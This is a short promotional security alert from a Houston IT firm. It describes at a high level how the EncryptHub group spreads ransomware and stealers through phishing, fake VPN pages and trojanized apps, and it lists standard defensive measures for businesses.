March 6, 2025
Cybersecurity / Ransomware
Impress IT Solutions, a leading cybersecurity provider in West Houston, is alerting local businesses about the growing threat posed by cybercriminal groups deploying ransomware and information-stealing malware through phishing campaigns and trojanized applications. One such threat actor, known as EncryptHub, has been actively refining its attack methods, posing a serious risk to organizations in various industries.
According to recent reports, EncryptHub has been distributing trojanized versions of popular applications and leveraging third-party Pay-Per-Install (PPI) services to maximize the reach of its malware. These tactics allow the attackers to infiltrate systems, steal sensitive data, and deploy ransomware that can cripple business operations.
How EncryptHub Targets Businesses
EncryptHub, also tracked as LARVA-208 by cybersecurity analysts, has been active since mid-2024. The group employs a variety of sophisticated tactics to compromise businesses, including:
- Phishing Attacks: Using SMS phishing (smishing) and voice phishing (vishing), attackers impersonate IT support personnel to trick employees into installing remote monitoring and management (RMM) software.
- Fake VPN Login Pages: Victims are directed to phishing sites that mimic legitimate company VPN portals, stealing credentials that grant attackers direct access to business networks.
- Social Engineering: Attackers call employees, posing as IT support, and convince them to enter login details on fraudulent sites under the guise of resolving technical issues.
- Malicious Software Installations: EncryptHub has been distributing trojanized versions of popular software such as Microsoft Teams, Google Meet, Visual Studio, and Palo Alto Global Protect to gain initial access.
Once inside a system, EncryptHub deploys PowerShell scripts to install stealer malware, such as Fickle, StealC, and Rhadamanthys, which exfiltrate sensitive business data. Ultimately, the attack culminates in ransomware deployment, locking critical business files and demanding ransom payments.
The Growing Threat of PPI Malware Distribution
Since early 2025, EncryptHub has been leveraging a third-party PPI service called LabInstalls, which sells bulk malware installations for as little as $10 per 100 installations. This approach enables cybercriminals to distribute their malware at scale with minimal effort.
“Threat actors are constantly evolving their attack methods to stay ahead of security defenses,” said an Impress IT Solutions cybersecurity expert. “The use of PPI services allows them to quickly spread malware, making it even more crucial for businesses in West Houston to stay vigilant and implement multi-layered security defenses.”
Protecting West Houston Businesses from Cyber Threats
Impress IT Solutions urges companies in West Houston to adopt a proactive cybersecurity strategy to defend against these threats. Recommended measures include:
- Employee Training: Educate staff on recognizing phishing attempts and social engineering tactics.
- Multi-Factor Authentication (MFA): Require MFA for VPNs, email accounts, and other critical business applications.
- Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions to identify and neutralize malware.
- Regular Security Audits: Conduct frequent assessments of security systems and policies.
- Backup and Recovery: Maintain secure, offsite backups to quickly restore systems in the event of a ransomware attack.
As cybercriminals continue to refine their techniques, businesses must remain vigilant. Impress IT Solutions is committed to helping West Houston companies strengthen their cybersecurity defenses against ransomware and data breaches.
For more information on how to protect your business, contact Impress IT Solutions today.
The 7 Most Critical IT Security Protections Every Business Must Have In Place Now To Protect Themselves From Cybercrime, Data Breaches And Hacker Attacks